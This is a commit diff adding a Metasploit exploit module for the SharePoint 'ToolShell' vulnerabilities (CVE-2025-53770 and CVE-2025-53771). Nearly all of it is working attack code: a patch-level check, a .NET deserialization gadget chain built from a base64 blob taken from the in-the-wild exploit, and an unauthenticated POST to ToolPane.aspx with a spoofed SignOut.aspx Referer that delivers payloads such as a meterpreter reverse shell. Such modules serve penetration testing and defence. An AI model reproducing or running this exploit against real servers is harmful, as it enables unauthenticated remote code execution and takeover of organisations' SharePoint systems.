add in exploit for CVE-2025-53770 and CVE-2025-53771, Microsoft SharePoint Server ToolPane Unauthenticated Remote Code Execution (aka ToolShell)

sfewer-r7 · sfewer-r7 · commit d2a1f7bae927 · 2025-07-23T12:40:14.000+01:00
diff --git a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
@@ -0,0 +1,239 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft SharePoint Server ToolPane Unauthenticated Remote Code Execution (aka ToolShell)',
+        'Description' => %q{
+          This module exploits the authentication bypass vulnerability CVE-2025-53771 (a patch bypass of CVE-2025-49706),
+          and an unsafe deserialization vulnerability CVE-2025-53770 (a patch bypass of CVE-2025-49704), to achieve
+          unauthenticated RCE against a vulnerable Microsoft SharePoint Server.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          # Discovered CVE-2025-49704 and CVE-2025-49706, demoed at Pwn2Own Berlin 2025.
+          'Viettel Cyber Security',
+          # Metasploit module, based on the public PoC of the zero-day exploit for CVE-2025-53770 and CVE-2025-53771.
+          'sfewer-r7'
+          # NOTE: The author attribution for CVE-2025-53770 and CVE-2025-53771 is unclear.
+        ],
+        'References' => [
+          # Microsoft SharePoint DataSetSurrogateSelector Deserialization of Untrusted Data Remote Code Execution Vulnerability.
+          ['CVE', '2025-49704'],
+          # Microsoft SharePoint ToolPane Authentication Bypass Vulnerability.
+          ['CVE', '2025-49706'],
+          # Patch bypass for CVE-2025-49704, exploited in-the-wild as a zero-day.
+          ['CVE', '2025-53770'],
+          # Patch bypass for CVE-2025-49706, exploited in-the-wild as a zero-day.
+          ['CVE', '2025-53771'],
+          # ZDI advisories for CVE-2025-49704 and CVE-2025-49706, discovered by Viettel Cyber Security.
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-580/'],
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-581/'],
+          # Microsoft advisories for CVE-2025-53770 and CVE-2025-53771, caught in-the-wild.
+          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770'],
+          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53771'],
+          # Microsoft Guidance.
+          ['URL', 'https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/'],
+          # The zero-day exploit for CVE-2025-53770 and CVE-2025-53771, published July 21, 2025.
+          ['URL', 'https://gist.github.com/gboddin/6374c04f84b58cef050f5f4ecf43d501'],
+          # Markus Wulftange (CODE WHITE GmbH) reproduced CVE-2025-49704 and CVE-2025-49706, circa July 14, 2025.
+          ['URL', 'https://x.com/codewhitesec/status/1944743478350557232'],
+          # Dinh Ho Anh Khoa (Viettel Cyber Security) demoed CVE-2025-49704 and CVE-2025-49706 at Pwn2Own Berlin on May 16, 2025.
+          ['URL', 'https://x.com/thezdi/status/1923317597673533552'],
+          # Prior work from Steven Seeley on a similar DataSet gadget chain for SharePoint.
+          ['URL', 'https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html']
+        ],
+        'DisclosureDate' => '2025-07-19', # Disclosure date for CVE-2025-53770 and CVE-2025-53771.
+        'Platform' => ['win'],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false, # Executes as the SharePoint site user.
+        'Targets' => [
+          [
+            'Default', {}
+          ]
+        ],
+        # NOTE: Tested with the following payloads:
+        #   cmd/windows/http/x64/meterpreter/reverse_tcp
+        #   cmd/windows/generic
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false,
+          # Delete the fetch binary after execution.
+          'FETCH_DELETE' => true,
+          # The root path of the SharePoint site
+          'URIPATH' => '/'
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'error.aspx')
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    return CheckCode::Unknown("Unexpected response code #{res.code}") unless res.code == 200
+
+    # The returned HTML will have a blob of JavaScript that contains a hash object called _spPageContextInfo. A key
+    # called siteClientTag will have a value of the current SharePoint Server patch level. We cannot rely on the HTTP
+    # header value MicrosoftSharePointTeamServices as this may not reflect the actual patch level.
+    site_client_tag = res.body.match(/"siteClientTag"\s*:\s*"\d*[$]+([^"]+)",/)
+
+    return CheckCode::Unknown('Unable to extract the siteClientTag') unless site_client_tag
+
+    version = Rex::Version.new(site_client_tag[1])
+
+    # We compare the version we pull from the target, against a table of known vulnerable SharePoint editions. We
+    # compare the target version against the RTM version (i.e. the first version of an edition) and the version *before*
+    # the patch for CVE-2025-53770 and CVE-2025-53771 (which supersedes patches for CVE-2025-49704 and CVE-2025-49706
+    # from July 2025).
+    # https://learn.microsoft.com/en-us/sharepoint/product-servicing-policy/updated-product-servicing-policy-for-sharepoint-2019
+    # https://learn.microsoft.com/en-us/officeupdates/sharepoint-updates
+
+    ranges = [
+      [
+        'Microsoft SharePoint Server Subscription Edition',
+        '16.0.14326.20450', # The RTM version (circa 2021)
+        '16.0.18526.20424' # July 2025
+      ],
+      [
+        'Microsoft SharePoint Server 2019',
+        '16.0.10337.12109', # The RTM version (circa 2019)
+        '16.0.10417.20027' # July 2025
+      ],
+      [
+        'Microsoft SharePoint Enterprise Server 2016',
+        '16.0.4351.1000', # The RTM version (circa 2017)
+        '16.0.5508.1000' # July 2025
+      ],
+      # NOTE: It is unclear if older unsupported versions (SharePoint Server 2013 and 2010) are vulnerable.
+      [
+        'SharePoint Server 2013',
+        '15.0.4481.1005',
+        '15.0.5545.1000' # Last version before end of support.
+      ],
+      [
+        'SharePoint Server 2010',
+        '14.0.7015.1000',
+        '14.0.7268.5000' # Last version before end of support.
+      ]
+    ]
+
+    ranges.each do |product, rtm_version, patch_version|
+      if version.between?(Rex::Version.new(rtm_version), Rex::Version.new(patch_version))
+        return Exploit::CheckCode::Appears("Detected #{product} version #{version}")
+      end
+    end
+
+    # If we get here, it's a patched version.
+    Exploit::CheckCode::Safe("Detected Microsoft SharePoint Server version #{version}")
+  end
+
+  def exploit
+    gadget_raw = create_gadget_chain
+    send_exploit(gadget_raw)
+  end
+
+  def create_gadget_chain
+    # NOTE: Depending on the version of SharePoint, different gadgets can be used.
+    #
+    # * A TypeConfuseDelegate + BinaryFormatter gadget chain was tested against Microsoft SharePoint Server 2019 version
+    # 16.0.10337.12109 (RTM circa 2019), but does not work on more recent versions like 16.0.10417.20018 (June 2025).
+    #
+    # * The XmlSchema DataSet chain which then wraps the TypeConfuseDelegate + LosFormatter gadget chain was tested to
+    # work against Microsoft SharePoint Server 2019 versions 16.0.10337.12109 (RTM circa 2019), 16.0.10417.20018
+    # (June 2025), and 16.0.10417.20027 (July 2025). This is the chain as caught in-the-wild circa July 19, 2025.
+
+    typeconfusedelegate_gadget_raw = ::Msf::Util::DotNetDeserialization.generate(
+      payload.encoded,
+      gadget_chain: :TypeConfuseDelegate,
+      formatter: :LosFormatter
+    )
+
+    vprint_status('Using TypeConfuseDelegate + LosFormatter gadget chain:')
+    vprint_line(Rex::Text.to_hex_dump(typeconfusedelegate_gadget_raw))
+
+    typeconfusedelegate_gadget_b64 = Base64.strict_encode64(typeconfusedelegate_gadget_raw)
+
+    # This gadget chain was pulled from the PoC posted here (https://gist.github.com/gboddin/6374c04f84b58cef050f5f4ecf43d501)
+    # and is thought to be from the zero-day exploit caught in-the-wild. The payload from the in-the-wild gadget has
+    # been removed and replaced with a string value "HAX".
+    #
+    # TO-DO: get rid of this base64 blob, and construct the gadget using the Msf::Util::DotNetDeserializatio helper routines.
+    dataset_gadget_b64 = 'AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0YSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAABNTeXN0ZW0uRGF0YS5EYXRhU2V0AgAAAAlYbWxTY2hlbWELWG1sRGlmZkdyYW0BAQIAAAAGAwAAAKEKPHhzOnNjaGVtYSB4bWxucz0iIiB4bWxuczp4cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zOm1zZGF0YT0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtbXNkYXRhIiBpZD0ic29tZWRhdGFzZXQiPg0KICAgICAgICAgICAgICAgIDx4czplbGVtZW50IG5hbWU9InNvbWVkYXRhc2V0IiBtc2RhdGE6SXNEYXRhU2V0PSJ0cnVlIiBtc2RhdGE6VXNlQ3VycmVudExvY2FsZT0idHJ1ZSI+DQogICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjaG9pY2UgbWluT2NjdXJzPSIwIiBtYXhPY2N1cnM9InVuYm91bmRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHhzOmVsZW1lbnQgbmFtZT0iaGVoZSI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8eHM6ZWxlbWVudCBuYW1lPSJwd24iIG1zZGF0YTpEYXRhVHlwZT0iU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuTGlzdGAxW1tTeXN0ZW0uRGF0YS5TZXJ2aWNlcy5JbnRlcm5hbC5FeHBhbmRlZFdyYXBwZXJgMltbU3lzdGVtLldlYi5VSS5Mb3NGb3JtYXR0ZXIsIFN5c3RlbS5XZWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iMDNmNWY3ZjExZDUwYTNhXSxbU3lzdGVtLldpbmRvd3MuRGF0YS5PYmplY3REYXRhUHJvdmlkZXIsIFByZXNlbnRhdGlvbkZyYW1ld29yaywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzVdXSwgU3lzdGVtLkRhdGEuU2VydmljZXMsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0iIHR5cGU9InhzOmFueVR5cGUiIG1pbk9jY3Vycz0iMCIvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmNob2ljZT4NCiAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICA8L3hzOnNjaGVtYT4GBAAAAMtHPGRpZmZncjpkaWZmZ3JhbSB4bWxuczptc2RhdGE9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eG1sLW1zZGF0YSIgeG1sbnM6ZGlmZmdyPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1kaWZmZ3JhbS12MSI+DQogICAgICAgICAgICAgICAgPHNvbWVkYXRhc2V0Pg0KICAgICAgICAgICAgICAgICAgICA8aGVoZSBkaWZmZ3I6aWQ9IlRhYmxlIiBtc2RhdGE6cm93T3JkZXI9IjAiIGRpZmZncjpoYXNDaGFuZ2VzPSJpbnNlcnRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICA8cHduIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZFdyYXBwZXJPZkxvc0Zvcm1hdHRlck9iamVjdERhdGFQcm92aWRlciB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiA+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZEVsZW1lbnQvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8UHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE1ldGhvZE5hbWU+RGVzZXJpYWxpemU8L01ldGhvZE5hbWU+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8TWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YW55VHlwZSB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4c2k6dHlwZT0ieHNkOnN0cmluZyI+SEFYPC9hbnlUeXBlPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9NZXRob2RQYXJhbWV0ZXJzPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE9iamVjdEluc3RhbmNlIHhzaTp0eXBlPSJMb3NGb3JtYXR0ZXIiPjwvT2JqZWN0SW5zdGFuY2U+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvUHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvRXhwYW5kZWRXcmFwcGVyT2ZMb3NGb3JtYXR0ZXJPYmplY3REYXRhUHJvdmlkZXI+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3B3bj4NCiAgICAgICAgICAgICAgICAgICAgPC9oZWhlPg0KICAgICAgICAgICAgICAgIDwvc29tZWRhdGFzZXQ+DQogICAgICAgICAgICA8L2RpZmZncjpkaWZmZ3JhbT4L'
+
+    dataset_gadget_raw = Base64.strict_decode64(dataset_gadget_b64)
+
+    # We have replaced the original payload from the in-the-wild exploit, with a string value "HAX". We use that "HAX"
+    # value to swap in our TypeConfuseDelegate gadget chain, and then fix up the string lengths.
+    dataset_gadget_raw.gsub!(
+      'HAX',
+      typeconfusedelegate_gadget_b64
+    ).gsub!(
+      Msf::Util::DotNetDeserialization.encode_7bit_int(9163),
+      Msf::Util::DotNetDeserialization.encode_7bit_int(9163 - 7772 + typeconfusedelegate_gadget_b64.length)
+    )
+
+    vprint_status('Using XmlSchema DataSet + BinaryFormatter gadget chain:')
+    vprint_line(Rex::Text.to_hex_dump(dataset_gadget_raw))
+
+    dataset_gadget_raw
+  end
+
+  def send_exploit(gadget_raw)
+    gadget_gzip = StringIO.new
+
+    gzip = Zlib::GzipWriter.new(gadget_gzip)
+    gzip.write(gadget_raw)
+    gzip.close
+
+    namespace_ui = Rex::Text.rand_text_alpha_lower(8..16)
+    namespace_scorecards = Rex::Text.rand_text_alpha_lower(8..16)
+
+    xml = <<~EOF
+      <%@ Register Tagprefix="#{namespace_ui}" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
+      <%@ Register Tagprefix="#{namespace_scorecards}" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
+        <#{namespace_ui}:UpdateProgress>
+          <ProgressTemplate>
+            <#{namespace_scorecards}:ExcelDataSet CompressedDataTable="#{Base64.strict_encode64(gadget_gzip.string)}" DataTable-CaseSensitive="true" runat="server"/>
+          </ProgressTemplate>
+        </#{namespace_ui}:UpdateProgress>
+    EOF
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'ToolPane.aspx'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => {
+        'Referer' => normalize_uri(target_uri.path, '_layouts', 'SignOut.aspx')
+      },
+      'vars_get' => {
+        'DisplayMode' => 'Edit',
+        'a' => '/ToolPane.aspx'
+      },
+      'vars_post' => {
+        'MSOTlPn_Uri' => full_uri(normalize_uri(target_uri.path, '_controltemplates', '15', 'AclEditor.ascx')),
+        'MSOTlPn_DWP' => xml
+      }
+    )
+  end
+end
